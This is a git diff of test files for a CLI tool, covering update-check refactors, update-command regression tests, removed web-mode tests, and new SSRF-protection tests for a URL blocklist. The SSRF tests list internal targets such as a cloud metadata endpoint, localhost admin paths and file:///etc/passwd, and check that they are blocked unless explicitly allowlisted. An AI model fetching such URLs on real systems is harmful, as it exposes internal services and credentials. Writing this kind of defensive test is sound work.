+    checkIntervalMs: 60 * 60 * 1000, // 1 hour
+    fetchTimeoutMs: 5000,
+    onUpdate: (_current, latest) => { reportedLatest = latest },
+  })
+
+  // Should use cached version (10.0.0), not the server's (20.0.0)
+  assert.equal(reportedLatest, '10.0.0')
 })
 
-test('checkForUpdates skips notification when cache is fresh and versions match', async () => {
+test('checkForUpdates skips notification when cache is fresh and versions match', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const cachePath = join(tmp, '.update-check')
   writeUpdateCache({ lastCheck: Date.now(), latestVersion: '1.0.0' }, cachePath)
 
-  try {
-    let called = false
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
 
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath,
-      checkIntervalMs: 60 * 60 * 1000,
-      fetchTimeoutMs: 5000,
-      onUpdate: () => { called = true },
-    })
+  let called = false
 
-    assert.ok(!called, 'onUpdate should not be called when cached version matches current')
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath,
+    checkIntervalMs: 60 * 60 * 1000,
+    fetchTimeoutMs: 5000,
+    onUpdate: () => { called = true },
+  })
+
+  assert.ok(!called, 'onUpdate should not be called when cached version matches current')
 })
 
-test('checkForUpdates handles server error gracefully', async () => {
+test('checkForUpdates handles server error gracefully', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const registry = await startMockRegistry({}, 500)
-  try {
-    let called = false
-
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath: join(tmp, '.update-check'),
-      registryUrl: registry.url,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 5000,
-      onUpdate: () => { called = true },
-    })
-
-    assert.ok(!called, 'onUpdate should not be called on server error')
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let called = false
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath: join(tmp, '.update-check'),
+    registryUrl: registry.url,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 5000,
+    onUpdate: () => { called = true },
+  })
+
+  assert.ok(!called, 'onUpdate should not be called on server error')
 })
 
-test('checkForUpdates handles network timeout gracefully', async () => {
+test('checkForUpdates handles network timeout gracefully', async (t) => {
   // Start a server that never responds
   const server = createServer(() => { /* intentionally never respond */ })
   await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve))
   const addr = server.address() as { port: number }
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
 
-  try {
-    let called = false
-
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath: join(tmp, '.update-check'),
-      registryUrl: `http://127.0.0.1:${addr.port}`,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 500, // Very short timeout
-      onUpdate: () => { called = true },
-    })
-
-    assert.ok(!called, 'onUpdate should not be called on timeout')
-  } finally {
+  t.after(async () => {
     await new Promise<void>((r) => server.close(() => r()))
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let called = false
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath: join(tmp, '.update-check'),
+    registryUrl: `http://127.0.0.1:${addr.port}`,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 500, // Very short timeout
+    onUpdate: () => { called = true },
+  })
+
+  assert.ok(!called, 'onUpdate should not be called on timeout')
 })
 
-test('checkForUpdates handles missing version field in response', async () => {
+test('checkForUpdates handles missing version field in response', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const registry = await startMockRegistry({ name: 'gsd-pi' }) // no version field
-  try {
-    let called = false
-
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath: join(tmp, '.update-check'),
-      registryUrl: registry.url,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 5000,
-      onUpdate: () => { called = true },
-    })
-
-    assert.ok(!called, 'onUpdate should not be called when response has no version')
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let called = false
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath: join(tmp, '.update-check'),
+    registryUrl: registry.url,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 5000,
+    onUpdate: () => { called = true },
+  })
+
+  assert.ok(!called, 'onUpdate should not be called when response has no version')
 })
diff --git a/src/tests/update-cmd-diagnostics.test.ts b/src/tests/update-cmd-diagnostics.test.ts
new file mode 100644
index 000000000..71fff7b36
--- /dev/null
+++ b/src/tests/update-cmd-diagnostics.test.ts
@@ -0,0 +1,27 @@
+/**
+ * Regression test for #3445: gsd update must print both current and latest
+ * versions for diagnostics, and bypass npm cache.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+test("update-cmd prints latest version before comparison (#3445)", () => {
+  const src = readFileSync(join(__dirname, "..", "update-cmd.ts"), "utf-8");
+  const latestPrintIdx = src.indexOf("Latest version:");
+  const comparisonIdx = src.indexOf("compareSemver(latest, current)");
+  assert.ok(latestPrintIdx !== -1, "Must print latest version");
+  assert.ok(latestPrintIdx < comparisonIdx, "Must print latest BEFORE comparison");
+});
+
+test("update-cmd bypasses npm cache (#3445)", () => {
+  const src = readFileSync(join(__dirname, "..", "update-cmd.ts"), "utf-8");
+  assert.ok(
+    src.includes("npm_config_cache"),
+    "Must clear npm cache env to bypass stale registry data",
+  );
+});
diff --git a/src/tests/url-utils.test.ts b/src/tests/url-utils.test.ts
index c73b359a7..300dbd084 100644
--- a/src/tests/url-utils.test.ts
+++ b/src/tests/url-utils.test.ts
@@ -1,6 +1,6 @@
-import { describe, it } from "node:test";
+import { describe, it, afterEach } from "node:test";
 import assert from "node:assert/strict";
-import { isBlockedUrl } from "../resources/extensions/search-the-web/url-utils.ts";
+import { isBlockedUrl, setFetchAllowedUrls, getFetchAllowedUrls } from "../resources/extensions/search-the-web/url-utils.ts";
 
 describe("isBlockedUrl — SSRF protection", () => {
   it("blocks localhost", () => {
@@ -57,3 +57,70 @@ describe("isBlockedUrl — SSRF protection", () => {
     assert.equal(isBlockedUrl("https://1.1.1.1/"), false);
   });
 });
+
+describe("REGRESSION #666: private URL blocked with no override", () => {
+  afterEach(() => {
+    setFetchAllowedUrls([]);
+  });
+
+  it("private IP is blocked by default, then unblocked by setFetchAllowedUrls", () => {
+    const internalUrl = "http://192.168.1.100/internal-docs/api-reference";
+
+    // Bug: private IP is blocked with no way to allowlist
+    assert.equal(isBlockedUrl(internalUrl), true, "private IP is blocked by the hardcoded blocklist");
+
+    // Fix: override the allowlist to include this host
+    setFetchAllowedUrls(["192.168.1.100"]);
+    assert.equal(isBlockedUrl(internalUrl), false, "private IP must not be blocked after override");
+  });
+});
+
+describe("setFetchAllowedUrls — user override", () => {
+  afterEach(() => {
+    setFetchAllowedUrls([]);
+  });
+
+  it("defaults to empty allowlist", () => {
+    assert.deepEqual(getFetchAllowedUrls(), []);
+  });
+
+  it("exempts an allowed hostname from blocking", () => {
+    assert.equal(isBlockedUrl("http://192.168.1.100/docs"), true, "blocked by default");
+    setFetchAllowedUrls(["192.168.1.100"]);
+    assert.equal(isBlockedUrl("http://192.168.1.100/docs"), false, "allowed after override");
+  });
+
+  it("exempts localhost when explicitly allowed", () => {
+    assert.equal(isBlockedUrl("http://localhost:3000/api"), true, "blocked by default");
+    setFetchAllowedUrls(["localhost"]);
+    assert.equal(isBlockedUrl("http://localhost:3000/api"), false, "allowed after override");
+  });
+
+  it("exempts cloud metadata hostname when allowed", () => {
+    assert.equal(isBlockedUrl("http://metadata.google.internal/computeMetadata/"), true, "blocked by default");
+    setFetchAllowedUrls(["metadata.google.internal"]);
+    assert.equal(isBlockedUrl("http://metadata.google.internal/computeMetadata/"), false, "allowed after override");
+  });
+
+  it("does not affect URLs not in the allowlist", () => {
+    setFetchAllowedUrls(["192.168.1.100"]);
+    assert.equal(isBlockedUrl("http://192.168.1.200/secret"), true, "other private IPs still blocked");
+    assert.equal(isBlockedUrl("http://localhost/admin"), true, "localhost still blocked");
+  });
+
+  it("still allows public URLs without configuration", () => {
+    setFetchAllowedUrls(["192.168.1.100"]);
+    assert.equal(isBlockedUrl("https://example.com"), false);
+  });
+
+  it("still blocks non-HTTP protocols even with allowlist", () => {
+    setFetchAllowedUrls(["localhost"]);
+    assert.equal(isBlockedUrl("file:///etc/passwd"), true, "file:// still blocked");
+    assert.equal(isBlockedUrl("ftp://localhost/data"), true, "ftp:// still blocked");
+  });
+
+  it("is case-insensitive for hostnames", () => {
+    setFetchAllowedUrls(["MyHost.Internal"]);
+    assert.equal(isBlockedUrl("http://myhost.internal/api"), false);
+  });
+});
\ No newline at end of file
diff --git a/src/tests/web-cli-entry.test.ts b/src/tests/web-cli-entry.test.ts
deleted file mode 100644
index 09eafb3f4..000000000
--- a/src/tests/web-cli-entry.test.ts
+++ /dev/null
@@ -1,105 +0,0 @@
-import test from "node:test";
-import assert from "node:assert/strict";
-import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import { pathToFileURL } from "node:url";
-
-const { resolveGsdCliEntry } = await import("../web/cli-entry.ts");
-
-function makeFixture(paths: string[]): string {
-  const root = mkdtempSync(join(tmpdir(), "gsd-cli-entry-"));
-  for (const relativePath of paths) {
-    const fullPath = join(root, relativePath);
-    mkdirSync(join(fullPath, ".."), { recursive: true });
-    writeFileSync(fullPath, "// fixture\n");
-  }
-  return root;
-}
-
-test("resolveGsdCliEntry prefers the built loader for packaged standalone interactive sessions", () => {
-  const packageRoot = makeFixture([
-    "dist/loader.js",
-    "src/loader.ts",
-    "src/resources/extensions/gsd/tests/resolve-ts.mjs",
-  ]);
-
-  try {
-    const entry = resolveGsdCliEntry({
-      packageRoot,
-      cwd: "/tmp/project-a",
-      execPath: "/custom/node",
-      hostKind: "packaged-standalone",
-      mode: "interactive",
-    });
-
-    assert.deepEqual(entry, {
-      command: "/custom/node",
-      args: [join(packageRoot, "dist", "loader.js")],
-      cwd: "/tmp/project-a",
-    });
-  } finally {
-    rmSync(packageRoot, { recursive: true, force: true });
-  }
-});
-
-test("resolveGsdCliEntry prefers the source loader for source-dev interactive sessions", () => {
-  const packageRoot = makeFixture([
-    "dist/loader.js",
-    "src/loader.ts",
-    "src/resources/extensions/gsd/tests/resolve-ts.mjs",
-  ]);
-
-  try {
-    const entry = resolveGsdCliEntry({
-      packageRoot,
-      cwd: "/tmp/project-b",
-      execPath: "/custom/node",
-      hostKind: "source-dev",
-      mode: "interactive",
-    });
-
-    assert.deepEqual(entry, {
-      command: "/custom/node",
-      args: [
-        "--import",
-        pathToFileURL(join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")).href,
-        "--experimental-strip-types",
-        join(packageRoot, "src", "loader.ts"),
-      ],
-      cwd: "/tmp/project-b",
-    });
-  } finally {
-    rmSync(packageRoot, { recursive: true, force: true });
-  }
-});
-
-test("resolveGsdCliEntry appends rpc arguments for bridge sessions", () => {
-  const packageRoot = makeFixture(["dist/loader.js"]);
-
-  try {
-    const entry = resolveGsdCliEntry({
-      packageRoot,
-      cwd: "/tmp/project-c",
-      execPath: "/custom/node",
-      hostKind: "packaged-standalone",
-      mode: "rpc",
-      sessionDir: "/tmp/.gsd/sessions/project-c",
-    });
-
-    assert.deepEqual(entry, {
-      command: "/custom/node",
-      args: [
-        join(packageRoot, "dist", "loader.js"),
-        "--mode",
-        "rpc",
-        "--continue",
-        "--session-dir",
-        "/tmp/.gsd/sessions/project-c",
-      ],
-      cwd: "/tmp/project-c",
-    });
-  } finally {
-    rmSync(packageRoot, { recursive: true, force: true });
-  }
-});
diff --git a/src/tests/web-mode-cli.test.ts b/src/tests/web-mode-cli.test.ts
deleted file mode 100644
index e6b8ae802..000000000
--- a/src/tests/web-mode-cli.test.ts
+++ /dev/null
@@ -1,670 +0,0 @@
-import test from 'node:test'
-import assert from 'node:assert/strict'
-import { mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs'
-import { join, resolve } from 'node:path'
-import { tmpdir } from 'node:os'
-
-const projectRoot = process.cwd()
-
-const cliWeb = await import('../cli-web-branch.ts')
-const webMode = await import('../web-mode.ts')
-
-test('parseCliArgs recognizes --web explicitly', () => {
-  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web'])
-  assert.equal(flags.web, true)
-  assert.equal(flags.print, undefined)
-  assert.equal(flags.mode, undefined)
-})
-
-test('package hooks declare a concrete staged web host', () => {
-  const rootPackage = JSON.parse(readFileSync(join(projectRoot, 'package.json'), 'utf-8'))
-  assert.equal(rootPackage.scripts['stage:web-host'], 'node scripts/stage-web-standalone.cjs')
-  assert.equal(rootPackage.scripts['build:web-host'], 'npm --prefix web run build && npm run stage:web-host')
-  assert.equal(rootPackage.scripts['gsd'], 'node scripts/dev-cli.js')
-  assert.equal(rootPackage.scripts['gsd:web'], 'npm run build:pi && npm run copy-resources && node scripts/build-web-if-stale.cjs && node scripts/dev-cli.js --web')
-  assert.equal(rootPackage.scripts['gsd:web:stop'], 'node scripts/dev-cli.js web stop')
-  assert.ok(rootPackage.files.includes('dist/web'))
-
-  const webPackage = JSON.parse(readFileSync(join(projectRoot, 'web', 'package.json'), 'utf-8'))
-  assert.equal(webPackage.scripts['start:standalone'], 'node .next/standalone/web/server.js')
-})
-
-test('web mode launcher defines or imports a browser opener', () => {
-  const source = readFileSync(join(projectRoot, 'src', 'web-mode.ts'), 'utf-8')
-  // openBrowser is now defined directly in web-mode.ts (was previously imported from onboarding.js)
-  assert.match(source, /openBrowser/)
-})
-
-test('cli.ts branches to web mode before interactive startup and preserves cwd-scoped launch inputs', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-cli-'))
-  const cwd = join(tmp, 'project space')
-  mkdirSync(cwd, { recursive: true })
-
-  let launchInputs: { cwd: string; projectSessionsDir: string; agentDir: string } | undefined
-
-  try {
-    const cliSource = readFileSync(join(projectRoot, 'src', 'cli.ts'), 'utf-8')
-    const branchIndex = cliSource.indexOf('const webBranch = await runWebCliBranch')
-    const modelRegistryIndex = cliSource.indexOf('const modelRegistry =')
-    assert.ok(branchIndex !== -1, 'cli.ts contains an explicit web branch handoff')
-    assert.ok(modelRegistryIndex !== -1, 'cli.ts still contains the model-registry startup path')
-    assert.ok(branchIndex < modelRegistryIndex, 'web branch runs before interactive startup state is constructed')
-
-    const result = await cliWeb.runWebCliBranch(cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web']), {
-      cwd: () => cwd,
-      runWebMode: async (options) => {
-        launchInputs = options
-        return {
-          mode: 'web',
-          ok: true,
-          cwd: options.cwd,
-          projectSessionsDir: options.projectSessionsDir,
-          host: '127.0.0.1',
-          port: 43123,
-          url: 'http://127.0.0.1:43123',
-          hostKind: 'source-dev',
-          hostPath: '/tmp/fake-web/package.json',
-          hostRoot: '/tmp/fake-web',
-        }
-      },
-    })
-
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected --web branch to be handled')
-    assert.equal(result.exitCode, 0)
-    assert.deepEqual(launchInputs, {
-      cwd,
-      projectSessionsDir: cliWeb.getProjectSessionsDir(cwd),
-      agentDir: join(process.env.HOME || '', '.gsd', 'agent'),
-      host: undefined,
-      port: undefined,
-      allowedOrigins: undefined,
-    })
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('launchWebMode prefers the packaged standalone host and opens the resolved URL', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-host-'))
-  const standaloneRoot = join(tmp, 'dist', 'web', 'standalone')
-  const serverPath = join(standaloneRoot, 'server.js')
-  mkdirSync(standaloneRoot, { recursive: true })
-  writeFileSync(serverPath, 'console.log("stub")\n')
-
-  let initResourcesCalled = false
-  let unrefCalled = false
-  let openedUrl = ''
-  let stderrOutput = ''
-  let spawnInvocation:
-    | { command: string; args: readonly string[]; options: Record<string, any> }
-    | undefined
-  let writtenPid: { path: string; pid: number } | undefined
-
-  const pidFilePath = join(tmp, 'web-server.pid')
-
-  try {
-    const status = await webMode.launchWebMode(
-      {
-        cwd: '/tmp/current-project',
-        projectSessionsDir: '/tmp/.gsd/sessions/--tmp-current-project--',
-        agentDir: '/tmp/.gsd/agent',
-        packageRoot: tmp,
-      },
-      {
-        initResources: () => {
-          initResourcesCalled = true
-        },
-        resolvePort: async () => 45123,
-        execPath: '/custom/node',
-        env: { TEST_ENV: '1' },
-        spawn: (command, args, options) => {
-          spawnInvocation = { command, args, options: options as Record<string, any> }
-          return {
-            pid: 99999,
-            once: () => undefined,
-            unref: () => {
-              unrefCalled = true
-            },
-          } as any
-        },
-        waitForBootReady: async () => undefined,
-        openBrowser: (url) => {
-          openedUrl = url
-        },
-        pidFilePath,
-        writePidFile: (path, pid) => {
-          writtenPid = { path, pid }
-          webMode.writePidFile(path, pid)
-        },
-        stderr: {
-          write(chunk: string) {
-            stderrOutput += chunk
-            return true
-          },
-        },
-      },
-    )
-
-    assert.equal(status.ok, true)
-    if (!status.ok) throw new Error('expected successful web launch status')
-    assert.equal(status.hostKind, 'packaged-standalone')
-    assert.equal(status.hostPath, serverPath)
-    assert.equal(status.url, 'http://127.0.0.1:45123')
-    assert.equal(initResourcesCalled, true)
-    assert.equal(unrefCalled, true)
-    // The browser URL now includes a random auth token as a fragment
-    assert.match(openedUrl, /^http:\/\/127\.0\.0\.1:45123\/#token=[a-f0-9]{64}$/)
-    // Extract the auth token the launcher generated so we can verify it was
-    // passed consistently to both the env and the browser URL.
-    const authToken = openedUrl.replace('http://127.0.0.1:45123/#token=', '')
-    assert.deepEqual(spawnInvocation, {
-      command: '/custom/node',
-      args: [serverPath],
-      options: {
-        cwd: standaloneRoot,
-        detached: true,
-        stdio: 'ignore',
-        env: {
-          TEST_ENV: '1',
-          HOSTNAME: '127.0.0.1',
-          PORT: '45123',
-          GSD_WEB_HOST: '127.0.0.1',
-          GSD_WEB_PORT: '45123',
-          GSD_WEB_AUTH_TOKEN: authToken,
-          GSD_WEB_PROJECT_CWD: '/tmp/current-project',
-          GSD_WEB_PROJECT_SESSIONS_DIR: '/tmp/.gsd/sessions/--tmp-current-project--',
-          GSD_WEB_PACKAGE_ROOT: tmp,
-          GSD_WEB_HOST_KIND: 'packaged-standalone',
-        },
-      },
-    })
-    assert.match(stderrOutput, /status=started/)
-    assert.match(stderrOutput, /port=45123/)
-    // PID file must be written with the spawned process's PID
-    assert.deepEqual(writtenPid, { path: pidFilePath, pid: 99999 })
-    assert.equal(webMode.readPidFile(pidFilePath), 99999)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('stopWebMode kills process by PID and removes PID file', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stop-'))
-  const pidFilePath = join(tmp, 'web-server.pid')
-  let stderrOutput = ''
-  let killedPid: number | undefined
-
-  try {
-    webMode.writePidFile(pidFilePath, 12345)
-
-    const result = webMode.stopWebMode({
-      pidFilePath,
-      readPidFile: webMode.readPidFile,
-      deletePidFile: webMode.deletePidFile,
-      stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
-      // Override process.kill to avoid killing a real process in tests
-    })
-
-    // Since PID 12345 is almost certainly dead, stopWebMode should succeed by treating ESRCH as "already gone"
-    assert.equal(result.ok, true)
-    assert.match(stderrOutput, /pid=12345/)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('stopWebMode reports error when no PID file exists', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stop-nopid-'))
-  const pidFilePath = join(tmp, 'web-server.pid')
-  let stderrOutput = ''
-
-  try {
-    const result = webMode.stopWebMode({
-      pidFilePath,
-      readPidFile: webMode.readPidFile,
-      deletePidFile: webMode.deletePidFile,
-      stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
-    })
-
-    assert.equal(result.ok, false)
-    assert.equal(result.reason, 'no-pid-file')
-    assert.match(stderrOutput, /not running/)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('runWebCliBranch handles "web stop" subcommand without --web flag', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-branch-stop-'))
-  const pidFilePath = join(tmp, 'web-server.pid')
-  let stderrOutput = ''
-
-  try {
-    const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'stop'])
-    assert.equal(flags.web, undefined)
-    assert.deepEqual(flags.messages, ['web', 'stop'])
-
-    const result = await cliWeb.runWebCliBranch(flags, {
-      stopWebMode: (deps) => {
-        return webMode.stopWebMode({ ...deps, pidFilePath })
-      },
-      stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
-    })
-
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected web stop to be handled')
-    assert.equal(result.exitCode, 1) // no PID file — expected failure
-    if (result.action !== 'stop') throw new Error('expected action=stop')
-    assert.equal(result.stopResult.ok, false)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-// ─── Path argument tests ──────────────────────────────────────────────
-
-test('parseCliArgs captures --web <path>', () => {
-  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '/tmp/my-project'])
-  assert.equal(flags.web, true)
-  assert.equal(flags.webPath, '/tmp/my-project')
-  assert.deepEqual(flags.messages, [])
-})
-
-test('parseCliArgs captures --web with relative path', () => {
-  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '../other-project'])
-  assert.equal(flags.web, true)
-  assert.equal(flags.webPath, '../other-project')
-})
-
-test('parseCliArgs does not capture --web followed by a flag as path', () => {
-  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '--model', 'test'])
-  assert.equal(flags.web, true)
-  assert.equal(flags.webPath, undefined)
-  assert.equal(flags.model, 'test')
-})
-
-test('gsd web <path> is handled as web start with path', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-path-'))
-  const projectDir = join(tmp, 'my-project')
-  mkdirSync(projectDir, { recursive: true })
-  let launchedCwd = ''
-
-  try {
-    const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', projectDir])
-    assert.deepEqual(flags.messages, ['web', projectDir])
-
-    const result = await cliWeb.runWebCliBranch(flags, {
-      runWebMode: async (options) => {
-        launchedCwd = options.cwd
-        return {
-          mode: 'web',
-          ok: true,
-          cwd: options.cwd,
-          projectSessionsDir: options.projectSessionsDir,
-          host: '127.0.0.1',
-          port: 43124,
-          url: 'http://127.0.0.1:43124',
-          hostKind: 'source-dev',
-          hostPath: '/tmp/fake-web/package.json',
-          hostRoot: '/tmp/fake-web',
-        }
-      },
-    })
-
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected web branch to be handled')
-    assert.equal(result.exitCode, 0)
-    assert.equal(launchedCwd, projectDir)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('gsd web start <path> resolves path and launches', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-start-path-'))
-  const projectDir = join(tmp, 'another-project')
-  mkdirSync(projectDir, { recursive: true })
-  let launchedCwd = ''
-
-  try {
-    const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'start', projectDir])
-    assert.deepEqual(flags.messages, ['web', 'start', projectDir])
-
-    const result = await cliWeb.runWebCliBranch(flags, {
-      runWebMode: async (options) => {
-        launchedCwd = options.cwd
-        return {
-          mode: 'web',
-          ok: true,
-          cwd: options.cwd,
-          projectSessionsDir: options.projectSessionsDir,
-          host: '127.0.0.1',
-          port: 43125,
-          url: 'http://127.0.0.1:43125',
-          hostKind: 'source-dev',
-          hostPath: '/tmp/fake-web/package.json',
-          hostRoot: '/tmp/fake-web',
-        }
-      },
-    })
-
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected web branch to be handled')
-    assert.equal(result.exitCode, 0)
-    assert.equal(launchedCwd, projectDir)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('gsd --web <path> resolves path and launches', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-flag-path-'))
-  const projectDir = join(tmp, 'flagged-project')
-  mkdirSync(projectDir, { recursive: true })
-  let launchedCwd = ''
-
-  try {
-    const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', projectDir])
-    assert.equal(flags.web, true)
-    assert.equal(flags.webPath, projectDir)
-
-    const result = await cliWeb.runWebCliBranch(flags, {
-      runWebMode: async (options) => {
-        launchedCwd = options.cwd
-        return {
-          mode: 'web',
-          ok: true,
-          cwd: options.cwd,
-          projectSessionsDir: options.projectSessionsDir,
-          host: '127.0.0.1',
-          port: 43126,
-          url: 'http://127.0.0.1:43126',
-          hostKind: 'source-dev',
-          hostPath: '/tmp/fake-web/package.json',
-          hostRoot: '/tmp/fake-web',
-        }
-      },
-    })
-
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected web branch to be handled')
-    assert.equal(result.exitCode, 0)
-    assert.equal(launchedCwd, projectDir)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('gsd --web <nonexistent-path> fails with clear error', async () => {
-  let stderrOutput = ''
-
-  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', '--web', '/tmp/nonexistent-gsd-test-path-xyz'])
-  const result = await cliWeb.runWebCliBranch(flags, {
-    stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } },
-  })
-
-  assert.equal(result.handled, true)
-  if (!result.handled) throw new Error('expected web branch to be handled')
-  assert.equal(result.exitCode, 1)
-  if (result.action !== 'start') throw new Error('expected action=start')
-  assert.equal(result.status.ok, false)
-  if (result.status.ok) throw new Error('expected failed status')
-  assert.match(result.status.failureReason, /does not exist/)
-  assert.match(stderrOutput, /does not exist/)
-})
-
-test('launch failure surfaces status and reason before browser open', async () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-missing-host-'))
-  let openedUrl = ''
-  let stderrOutput = ''
-
-  try {
-    const status = await webMode.launchWebMode(
-      {
-        cwd: '/tmp/current-project',
-        projectSessionsDir: '/tmp/.gsd/sessions/--tmp-current-project--',
-        agentDir: '/tmp/.gsd/agent',
-        packageRoot: tmp,
-      },
-      {
-        openBrowser: (url) => {
-          openedUrl = url
-        },
-        stderr: {
-          write(chunk: string) {
-            stderrOutput += chunk
-            return true
-          },
-        },
-      },
-    )
-
-    assert.equal(status.ok, false)
-    if (status.ok) throw new Error('expected failed web launch status')
-    assert.equal(status.hostPath, null)
-    assert.equal(status.url, null)
-    assert.equal(openedUrl, '')
-    assert.match(status.failureReason, /host bootstrap not found/)
-    assert.match(stderrOutput, /status=failed/)
-    assert.match(stderrOutput, /reason=host bootstrap not found/)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-// ─── Instance registry tests ─────────────────────────────────────────
-
-test('registerInstance and readInstanceRegistry round-trip', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-registry-'))
-  const registryPath = join(tmp, 'web-instances.json')
-
-  try {
-    webMode.registerInstance('/tmp/project-a', { pid: 1001, port: 3000, url: 'http://127.0.0.1:3000' }, registryPath)
-    webMode.registerInstance('/tmp/project-b', { pid: 1002, port: 3001, url: 'http://127.0.0.1:3001' }, registryPath)
-
-    const registry = webMode.readInstanceRegistry(registryPath)
-    assert.equal(Object.keys(registry).length, 2)
-    assert.equal(registry[resolve('/tmp/project-a')]?.pid, 1001)
-    assert.equal(registry[resolve('/tmp/project-b')]?.port, 3001)
-    assert.ok(registry[resolve('/tmp/project-a')]?.startedAt)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('unregisterInstance removes a single entry', () => {
-  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-unreg-'))
-  const registryPath = join(tmp, 'web-instances.json')
-
-  try {
-    webMode.registerInstance('/tmp/project-a', { pid: 1001, port: 3000, url: 'http://127.0.0.1:3000' }, registryPath)
-    webMode.registerInstance('/tmp/project-b', { pid: 1002, port: 3001, url: 'http://127.0.0.1:3001' }, registryPath)
-    webMode.unregisterInstance('/tmp/project-a', registryPath)
-
-    const registry = webMode.readInstanceRegistry(registryPath)
-    assert.equal(Object.keys(registry).length, 1)
-    assert.equal(registry[resolve('/tmp/project-a')], undefined)
-    assert.equal(registry[resolve('/tmp/project-b')]?.pid, 1002)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
-})
-
-test('stopWebMode with projectCwd reports not-found when not in registry', () => {
-  let stderrOutput = ''
-
-  const result = webMode.stopWebMode(
-    { stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } } },
-    { projectCwd: '/tmp/nonexistent-project-for-stop-test' },
-  )
-
-  assert.equal(result.ok, false)
-  assert.equal(result.reason, 'not-found')
-  assert.match(stderrOutput, /No web server running/)
-})
-
-test('gsd web stop all is parsed and dispatched', async () => {
-  let stopOptions: { projectCwd?: string; all?: boolean } | undefined
-
-  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'stop', 'all'])
-  assert.deepEqual(flags.messages, ['web', 'stop', 'all'])
-
-  const result = await cliWeb.runWebCliBranch(flags, {
-    stopWebMode: (_deps, opts) => {
-      stopOptions = opts
-      return { ok: true, stoppedCount: 2 }
-    },
-    stderr: { write: () => true },
-  })
-
-  assert.equal(result.handled, true)
-  if (!result.handled) throw new Error('expected handled')
